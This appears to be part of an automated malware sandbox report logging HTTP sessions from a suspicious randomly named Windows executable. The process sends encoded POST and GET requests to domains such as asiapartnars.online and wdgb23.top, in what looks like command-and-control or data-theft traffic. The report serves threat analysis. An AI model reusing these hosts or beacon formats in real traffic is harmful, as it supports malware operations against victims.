                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Data Raw: 6f 30 49 38 62 4a 57 68 3d 50 4f 4d 58 67 67 6c 4c 6b 47 47 46 71 74 46 4e 54 37 50 4c 2f 54 52 6f 4f 68 48 4b 59 30 77 33 58 6f 4a 4a 46 64 55 6f 6a 74 4e 4b 67 31 6d 45 2b 38 4a 6f 44 55 42 59 55 5a 49 66 46 5a 34 48 34 42 45 35 76 61 57 4b 36 44 6d 44 6c 31 39 30 53 47 4d 61 79 65 39 39 41 64 50 6d 6d 37 2b 36 46 35 31 38 79 31 4c 52 59 34 34 6f 2f 6b 75 39 45 61 44 61 31 6b 30 39 53 65 39 68 48 4d 76 58 57 45 39 71 66 39 56 33 71 32 72 76 32 36 59 59 77 2b 47 79 70 46 4e 43 5a 61 2b 61 44 41 42 48 4b 76 68 6c 54 77 43 2f 67 6d 51 6a 52 65 53 35 7a 77 6b 4f 76 50 57 4d 41 55 53 6e 4c 41 55 54 78 77 6d 72 6b 6a 50 75 6b 79 45 45 39 61 41 4a 74 5a 78 49 4e 48 49 59 35 74 39 43 53 55 68 63 56 78 61 34 49 30 69 77 74 56 59 61 4a 36 6f 4e 6e 76 68 68 6f 4d 4d 4c 59 43 54 38 53 74 79 43 75 47 62 64 78 66 4c 70 6c 33 45 70 6f 37 4c 35 4d 42 33 6f 46 62 31 2b 56 74 2b 43 5a 50 4b 39 79 31 44 47 6e 6e 53 65 42 4d 4a 66 35 72 50 62 48 35 55 2b 72 6c 50 33 61 69 53 62 30 55 41 64 43 36 53 54 2b 43 65 6f 63 [TRUNCATED]
                                                                                                  Data Ascii: o0I8bJWh=POMXgglLkGGFqtFNT7PL/TRoOhHKY0w3XoJJFdUojtNKg1mE+8JoDUBYUZIfFZ4H4BE5vaWK6DmDl190SGMaye99AdPmm7+6F518y1LRY44o/ku9EaDa1k09Se9hHMvXWE9qf9V3q2rv26YYw+GypFNCZa+aDABHKvhlTwC/gmQjReS5zwkOvPWMAUSnLAUTxwmrkjPukyEE9aAJtZxINHIY5t9CSUhcVxa4I0iwtVYaJ6oNnvhhoMMLYCT8StyCuGbdxfLpl3Epo7L5MB3oFb1+Vt+CZPK9y1DGnnSeBMJf5rPbH5U+rlP3aiSb0UAdC6ST+CeocsKV05MPfzxqO9fmzzQ5I4GfburHps4ePMAiRfwJOAUnL8kmAL6tnZgmvsb+HbjZWEh/QnUWIWBh5jASWvqgE/d+DKwrnAmZ6s+tCRRIRF2IryE50opUQhataIyzVpfkgg3H1Gik1jaVTZMqKCzvMRWL2cH2+H2tAfO3IAyPkSm/0X/4S9laEYUuzBHokdSf3q1U2PElndJLxLQIm1ym3r+TyEA1ucYmtvDJANp5QeyIqfWCn2zULBTEUujRMDuFfDMkv5YNRaRMDLmC3ZaN21qqunvB36d8RkUvcBwsMby8xvKnOGucFRxtDf2ETzs0AOJ7d/sIlid558AJ2gMOUqZKSLp045POIVAgHwzh0+VkbInOWssDB+eyBGU66gWZ2LW7gIxKad3jXTzx29UVerfaKcEOseQpzkKjbHR8CuB27L5XIcf1I6tOL0aPlCdiJwmbSPjCvGuY0VQ3uS8zqi8GQBqbI1JiQ5j1LcnsEMIb6G4L6O0WEVG0EZFJhVXXf9chGnz2j9E4j0/6FuRXm9M5bLI8Y8zp+Q8uohWj4JfxuJczgLWwfxMKWbpvZZCSFcUqmhOyzeqB8f+pTEa5y4rBv/HYV1YQETz8is4BAcHDUiWNIKZeqaqzf0vnkXnVtpwwNwo0NK8BCeh2El2Aw5YIzpdPC+TEvKh [TRUNCATED]
                                                                                                  Oct 21, 2024 13:16:02.679402113 CEST1675OUTData Raw: 38 4a 37 50 6c 4d 76 47 31 59 69 79 69 71 49 45 64 79 36 41 72 45 74 55 58 2f 41 6c 38 51 4c 6d 37 59 76 42 7a 63 67 69 66 56 53 79 46 72 64 2b 50 4e 66 78 5a 36 78 5a 51 78 6e 74 54 75 44 76 36 6f 68 6f 76 6d 57 56 36 64 52 6d 39 2f 75 66 6f 42
                                                                                                  Data Ascii: 8J7PlMvG1YiyiqIEdy6ArEtUX/Al8QLm7YvBzcgifVSyFrd+PNfxZ6xZQxntTuDv6ohovmWV6dRm9/ufoBpcKsHoR4KyuhaNCHv1O0UfaUX6Fwl07G5CzliGpS3pTa2CPfq3nq3Jkjt20XfnceGmwes/nGAKQEcWp6sWjVLl6lUzac5p2YTEbc9Y6GMkur1HTfPzFNKTf8I6gL3NBV3QhmtxX4yLvYK+zqygBRDm7BcDA2yHN2p
                                                                                                  Oct 21, 2024 13:16:03.356532097 CEST533INHTTP/1.1 404 Not Found
                                                                                                  Date: Mon, 21 Oct 2024 11:16:03 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 389
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  10192.168.2.2249177162.0.238.246801564C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 21, 2024 13:16:06.459635019 CEST469OUTGET /qd68/?o0I8bJWh=CMk3jWV7n2ud16JbSoz++xJaAy6tYmolV54GWsIImY9wr32Fxex2EERnMtANYc4DvCE1goWK72es3TtLYGEc3O5acPz147mgbIRl7hCPTM53qHiPKqWo/3UkWZwG&IzCDX=JREpwHC8S HTTP/1.1
                                                                                                  Host: www.guldeu.xyz
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Oct 21, 2024 13:16:07.149261951 CEST548INHTTP/1.1 404 Not Found
                                                                                                  Date: Mon, 21 Oct 2024 11:16:07 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 389
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  11192.168.2.224917815.197.148.33801564C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 21, 2024 13:16:12.237410069 CEST2472OUTPOST /rmem/ HTTP/1.1
                                                                                                  Host: www.asiapartnars.online
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Origin: http://www.asiapartnars.online
                                                                                                  Content-Length: 2165
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Referer: http://www.asiapartnars.online/rmem/
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Data Raw: 6f 30 49 38 62 4a 57 68 3d 36 6b 44 41 37 37 70 56 39 65 6f 76 53 4a 5a 4c 4e 76 61 30 73 50 53 45 67 36 5a 32 4d 54 64 4d 5a 72 5a 72 43 2b 46 35 63 41 6e 53 6c 55 42 30 51 69 4e 74 57 44 54 2b 68 70 79 32 55 68 61 64 49 51 32 43 76 7a 58 2b 37 76 49 45 61 4a 48 2f 6b 67 35 33 58 6f 38 46 6d 6a 6c 57 4a 62 67 6c 55 30 57 78 2b 53 59 57 54 79 69 64 36 41 62 48 45 2b 6c 4a 6c 36 43 74 66 45 38 77 42 52 79 7a 42 6b 65 41 64 42 6b 71 37 57 38 58 71 6d 4c 58 32 65 4d 72 30 41 41 6c 70 4f 32 4d 75 66 69 45 30 6d 4b 66 67 39 34 55 51 38 34 68 39 46 42 49 42 68 34 74 38 44 6e 51 67 69 65 70 48 43 45 77 4e 39 59 78 6d 44 63 2b 52 6d 55 67 6a 34 72 66 54 34 67 71 46 42 6e 37 49 48 6a 61 58 47 63 65 4b 52 34 72 62 6a 62 55 7a 42 64 37 2b 66 74 36 7a 4e 47 71 70 6c 34 4d 63 67 54 4b 4b 6f 68 6f 78 53 30 71 64 71 51 69 32 34 39 4c 4a 75 65 69 4a 2b 65 7a 44 4a 2b 61 6b 5a 50 68 74 4c 6b 6f 77 38 4a 52 4e 77 35 45 64 44 47 68 75 52 78 7a 54 68 35 71 58 45 35 43 49 37 75 72 48 6a 32 6c 6c 73 6e 74 43 6a 54 4a 74 [TRUNCATED]
                                                                                                  Data Ascii: o0I8bJWh=6kDA77pV9eovSJZLNva0sPSEg6Z2MTdMZrZrC+F5cAnSlUB0QiNtWDT+hpy2UhadIQ2CvzX+7vIEaJH/kg53Xo8FmjlWJbglU0Wx+SYWTyid6AbHE+lJl6CtfE8wBRyzBkeAdBkq7W8XqmLX2eMr0AAlpO2MufiE0mKfg94UQ84h9FBIBh4t8DnQgiepHCEwN9YxmDc+RmUgj4rfT4gqFBn7IHjaXGceKR4rbjbUzBd7+ft6zNGqpl4McgTKKohoxS0qdqQi249LJueiJ+ezDJ+akZPhtLkow8JRNw5EdDGhuRxzTh5qXE5CI7urHj2llsntCjTJtGs6x3e6/PCVH+tf9xpth0QGDiAeaCJfuVb6j5B98LoVLfyYYU8FPAXwLizRzAHwKMnKMWUwVuCwiNsR1tRDB7nRIVnxGLdyw1E3VUPISUpy8mr3Pmmi1ir3CKAsxe7SFViy+Ni39+3TMNsO2808lSrgho+PSVVMfXLz8PaOg9BMwSHHS9q1T1P+SwfC6GEEwQOsE+SxpqmgFkdLDTzRPthrakiLrpxbEuQOI0wq1QJc6QZ3yj48wDJjJ6gd34dBuZskgVgIGjaIuCJPtw2kNor9ZcWpmTZpdehL+6+QE7MCO57H6bkjkoOKMd1qX3Sjs9hbpMlHLZxbE/aeCaAlCNyU8pnhz2JkupuaVzU+gOpvWFK5iE0XvT/IwzF06uM8QuydERJj3ZcdNlf9ISAuy8ohhqh+Lma9H8fQBiSXfMvO4amMTbWzmz38SeK9Oc3ut8KNY9xXeqtG6ftJAJb4ForwI6szsCwgWJr7dnTmWOAkyeFpt6EM9B+TVjeSb9exzgdQ1wQy/kO2KNw3YUx50HFzCtwbG8h/wyksJ/76xA8Vvz62HWOqB1O7f9mzheW2rO3Wot18PQRj+da4TaM20pki078htKkUyuiTQSoHDw1fUZZ4Z++7p6nLwwzWn0Y5ByUiaRobHwEOtm/witL0C1GSONAp770EVfg [TRUNCATED]
                                                                                                  Oct 21, 2024 13:16:12.243108034 CEST238OUTData Raw: 45 52 46 78 45 35 63 53 73 4d 68 38 33 36 6b 6b 48 4f 6e 72 79 6a 49 79 35 71 48 62 44 4a 30 55 75 58 38 31 43 66 6d 41 75 51 36 48 56 4f 4f 59 66 6a 49 44 57 56 43 72 50 53 78 63 63 32 72 67 6d 76 76 43 68 50 6f 73 7a 31 4a 55 4e 44 47 44 6b 31
                                                                                                  Data Ascii: ERFxE5cSsMh836kkHOnryjIy5qHbDJ0UuX81CfmAuQ6HVOOYfjIDWVCrPSxcc2rgmvvChPosz1JUNDGDk1GzzwWQbmwGIoV+uk4ndPm8u6hVEstKIO/BcKIrRpkUj4qi0ApqeIPgCDqJSCt3bxwI0HOZJcfEJEPNozZzjzo6krC8mUCQaI5nBc0LDlE7LrLXc6x1zJZEdbdBHNBLQmodORsOqCiV2ZpwFnkPUMDycgQCdK


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  12192.168.2.224917915.197.148.33801564C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 21, 2024 13:16:14.785214901 CEST749OUTPOST /rmem/ HTTP/1.1
                                                                                                  Host: www.asiapartnars.online
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Origin: http://www.asiapartnars.online
                                                                                                  Content-Length: 205
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Referer: http://www.asiapartnars.online/rmem/
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Data Raw: 6f 30 49 38 62 4a 57 68 3d 36 6b 44 41 37 37 70 56 39 65 6f 76 53 4f 74 4c 66 4c 32 30 74 76 53 45 6a 36 5a 32 61 6a 63 6d 5a 72 45 59 43 37 6b 38 63 78 76 53 6c 46 78 30 52 52 31 74 56 44 54 39 72 4a 79 36 4b 52 62 46 49 51 32 6f 76 79 37 2b 37 76 63 45 62 6f 37 2f 6d 6b 4e 30 55 59 38 48 67 6a 6c 58 4a 62 73 4f 55 30 61 62 2b 57 63 57 54 78 47 64 30 67 4c 48 53 4d 64 4a 7a 36 43 33 5a 45 39 6f 42 51 50 78 42 6b 4f 79 64 42 59 71 36 6b 49 58 71 33 72 58 38 70 59 72 36 51 41 6d 69 65 33 76 2b 71 66 4d 71 31 50 55 6d 63 38 36 4f 6f 34 57 32 31 6c 30 4e 44 41 65 39 42 53 37 2f 6e 37 6d 4c 51 46 70 4a 67 3d 3d
                                                                                                  Data Ascii: o0I8bJWh=6kDA77pV9eovSOtLfL20tvSEj6Z2ajcmZrEYC7k8cxvSlFx0RR1tVDT9rJy6KRbFIQ2ovy7+7vcEbo7/mkN0UY8HgjlXJbsOU0ab+WcWTxGd0gLHSMdJz6C3ZE9oBQPxBkOydBYq6kIXq3rX8pYr6QAmie3v+qfMq1PUmc86Oo4W21l0NDAe9BS7/n7mLQFpJg==


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  13192.168.2.224918015.197.148.33801564C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 21, 2024 13:16:17.337447882 CEST2472OUTPOST /rmem/ HTTP/1.1
                                                                                                  Host: www.asiapartnars.online
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Origin: http://www.asiapartnars.online
                                                                                                  Content-Length: 3629
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Referer: http://www.asiapartnars.online/rmem/
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Data Raw: 6f 30 49 38 62 4a 57 68 3d 36 6b 44 41 37 37 70 56 39 65 6f 76 54 75 39 4c 64 71 32 30 38 66 53 44 2f 71 5a 32 4d 54 63 71 5a 72 59 59 43 2b 46 35 63 45 58 53 6c 53 56 30 52 79 4e 74 58 44 54 39 2f 35 79 32 55 68 61 63 49 51 69 53 76 7a 4b 4a 37 73 77 45 61 4c 76 2f 6b 6e 6c 33 65 49 38 46 71 44 6c 55 4a 62 73 58 55 30 4b 66 2b 57 6f 77 54 78 4f 64 30 57 66 48 46 4d 64 4f 76 71 43 33 5a 45 39 30 42 51 4f 6b 42 6b 47 71 64 41 51 36 37 56 34 58 71 57 4c 58 77 75 4d 73 78 77 42 76 74 4f 32 43 75 66 6d 54 30 6d 4c 57 67 39 73 2b 51 38 38 68 39 57 5a 49 42 69 51 71 7a 7a 6e 52 39 53 65 70 4a 69 45 79 4e 39 59 62 6d 44 63 2b 52 6c 41 67 78 34 72 66 54 35 67 6c 61 52 6e 37 54 48 69 59 61 6d 51 4b 4b 52 74 49 62 6a 72 45 30 79 78 37 2f 64 56 36 35 64 47 71 72 56 34 47 63 67 54 4e 54 34 68 65 78 57 5a 56 64 71 42 6e 32 34 39 4c 4a 73 57 69 4f 73 47 7a 53 5a 2b 61 35 4a 50 6b 36 62 6b 33 77 38 38 30 4e 78 39 45 64 43 65 68 75 6d 39 7a 62 44 52 72 50 45 35 44 43 62 75 70 44 6a 32 38 6c 73 36 41 43 6a 61 42 74 [TRUNCATED]
                                                                                                  Data Ascii: o0I8bJWh=6kDA77pV9eovTu9Ldq208fSD/qZ2MTcqZrYYC+F5cEXSlSV0RyNtXDT9/5y2UhacIQiSvzKJ7swEaLv/knl3eI8FqDlUJbsXU0Kf+WowTxOd0WfHFMdOvqC3ZE90BQOkBkGqdAQ67V4XqWLXwuMsxwBvtO2CufmT0mLWg9s+Q88h9WZIBiQqzznR9SepJiEyN9YbmDc+RlAgx4rfT5glaRn7THiYamQKKRtIbjrE0yx7/dV65dGqrV4GcgTNT4hexWZVdqBn249LJsWiOsGzSZ+a5JPk6bk3w880Nx9EdCehum9zbDRrPE5DCbupDj28ls6ACjaBtHc6xxC66uCVGOtelhokl0saDkZPaCNQuTT6jpt99O8WXfykU08fcQXKLin/zAnwL5bKNSYwRdqzk9sWk9RubLnFIViiGJ0/xA43UkPICnBxhGr+BGnr/CrlCKBLxbOpFlqy+O63+sPTMNsBz80+vy34hoCDSU5cfW7z8+KOg8BMrCHHedqMYVPwSwa/6Hs6wkesEcKxrv6gHEdJBTzULtgBanaLrsIeEv4OIWYq1xJc8QZzxj4/wDIaJ6Ua34N3ubYkgVMIAiaIxiJK+A2gH4qDZdC5mTlDdfpLx+KQXugCcJ7Fy7kjrIOSMdt6X3Oss4dbp55HK5xYNfadP6AmU9yC8p3hz2FkutSaWA8+qdBvV1K7mE1AkzjkwzV46vJ5QtGdGAJj970cC1fneCAk28oZhqh6Lk74HOHQA3mXZdvNwanEa7WkrT2LSeabOdTEtvuNY+5XeY1G9vtJAJb7Foq5I6pKsCgOWJr7cyvmR9ok4+FoiaEtrx/CVjaOb9XczgxQvEMy/kO1Adw0fUx+0H5ECtwhG8l/wAIsGNz6xlIV4j62X2OpalO4f9mjhaH9rLbWpdV8OUxs2Na1b6Nuh5Yx07B8tKAUy+eTQCEHDA1fcZZ7BO+qkabXwwvwnxF0BDkiag4bBzcJh2/ksNL2C1biON4b7695VY0 [TRUNCATED]
                                                                                                  Oct 21, 2024 13:16:17.343046904 CEST1702OUTData Raw: 34 6b 46 78 45 31 63 53 6f 4d 68 39 48 36 6b 6a 7a 4f 67 62 79 67 58 79 35 70 64 4c 44 4f 76 45 75 62 38 31 43 74 6d 46 2b 71 36 42 35 4f 4f 4c 6e 6a 4d 78 2b 56 43 62 50 55 6b 73 64 6f 76 68 61 39 76 46 70 4c 6f 6f 37 44 4a 46 74 44 45 31 6f 31
                                                                                                  Data Ascii: 4kFxE1cSoMh9H6kjzOgbygXy5pdLDOvEub81CtmF+q6B5OOLnjMx+VCbPUksdovha9vFpLoo7DJFtDE1o1DBrwcgaBzGIlV/SA4jxim4iDhkYs3aIO7EwNDLRjt0jlqi0spqmMPhutqNeCtxvxw40EaZIVeEIbPMVfZy3do7UrC5uUEwKIpHBc8rDgNbL2T3Q5x3SPfEkDU2D+P+QIurKrt4nwg2iEuQhPn/Q2SkoGV14w58YZQ


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  14192.168.2.224918115.197.148.33801564C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 21, 2024 13:16:19.880147934 CEST478OUTGET /rmem/?o0I8bJWh=3mrg4OdF971xdpR9JqOipvCghMgMNm9pdqQXdKBxeUX/uUFHRyFRUgP+leOKIhGfNBOtjijimK07Q8HHjxhFaJ4HohJ/XqsVK02RuScXQBf97wXpW/1str23dyM9&IzCDX=JREpwHC8S HTTP/1.1
                                                                                                  Host: www.asiapartnars.online
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Oct 21, 2024 13:16:20.496273041 CEST404INHTTP/1.1 200 OK
                                                                                                  Server: openresty
                                                                                                  Date: Mon, 21 Oct 2024 11:16:20 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 264
                                                                                                  Connection: close
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6f 30 49 38 62 4a 57 68 3d 33 6d 72 67 34 4f 64 46 39 37 31 78 64 70 52 39 4a 71 4f 69 70 76 43 67 68 4d 67 4d 4e 6d 39 70 64 71 51 58 64 4b 42 78 65 55 58 2f 75 55 46 48 52 79 46 52 55 67 50 2b 6c 65 4f 4b 49 68 47 66 4e 42 4f 74 6a 69 6a 69 6d 4b 30 37 51 38 48 48 6a 78 68 46 61 4a 34 48 6f 68 4a 2f 58 71 73 56 4b 30 32 52 75 53 63 58 51 42 66 39 37 77 58 70 57 2f 31 73 74 72 32 33 64 79 4d 39 26 49 7a 43 44 58 3d 4a 52 45 70 77 48 43 38 53 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?o0I8bJWh=3mrg4OdF971xdpR9JqOipvCghMgMNm9pdqQXdKBxeUX/uUFHRyFRUgP+leOKIhGfNBOtjijimK07Q8HHjxhFaJ4HohJ/XqsVK02RuScXQBf97wXpW/1str23dyM9&IzCDX=JREpwHC8S"}</script></head></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  15192.168.2.2249182206.119.82.148801564C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 21, 2024 13:16:25.525779009 CEST2472OUTPOST /v5ff/ HTTP/1.1
                                                                                                  Host: www.wdgb23.top
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Origin: http://www.wdgb23.top
                                                                                                  Content-Length: 2165
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Referer: http://www.wdgb23.top/v5ff/
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
                                                                                                  Data Raw: 6f 30 49 38 62 4a 57 68 3d 33 49 46 45 62 66 78 63 49 55 2f 59 6e 6f 35 6f 6f 37 7a 71 41 50 79 72 39 75 37 4f 47 6c 38 36 43 6b 56 33 6d 70 5a 70 44 64 2b 37 6a 56 73 64 61 57 39 68 56 66 54 70 6e 30 75 78 4c 6d 58 78 4d 59 4b 2f 4a 53 35 43 66 4e 72 61 76 51 70 72 72 77 6e 43 71 79 35 57 6b 6c 66 45 68 4d 39 70 32 2b 37 5a 6f 57 54 49 4c 45 2f 4a 75 62 73 42 53 79 4f 71 2f 2f 7a 64 49 48 76 68 54 71 39 4a 49 56 66 31 48 39 2b 70 6a 6e 43 66 6f 54 37 57 6c 4c 36 37 5a 42 79 7a 66 52 57 37 48 52 45 70 35 4e 38 59 38 63 45 71 68 30 61 38 51 2b 4a 51 6b 34 42 5a 65 51 37 32 4e 4c 30 71 4d 72 4c 42 49 73 7a 77 30 47 4b 55 77 69 77 35 42 50 35 46 38 63 4c 6a 43 77 48 6e 44 2b 38 58 51 6f 71 61 30 48 43 48 32 66 4c 2b 4c 66 58 6e 61 51 6f 44 35 4d 36 73 54 76 45 6f 59 49 49 36 72 44 76 4b 50 4b 35 35 75 32 5a 44 75 6f 79 5a 32 37 77 4d 56 59 76 50 64 4c 2f 32 52 63 58 4b 32 35 44 79 51 68 59 42 35 41 61 70 4d 38 43 57 57 4f 69 49 4e 6e 39 39 65 67 36 4d 4b 44 78 73 4d 55 4e 54 37 39 33 6d 50 4a 32 55 54 [TRUNCATED]
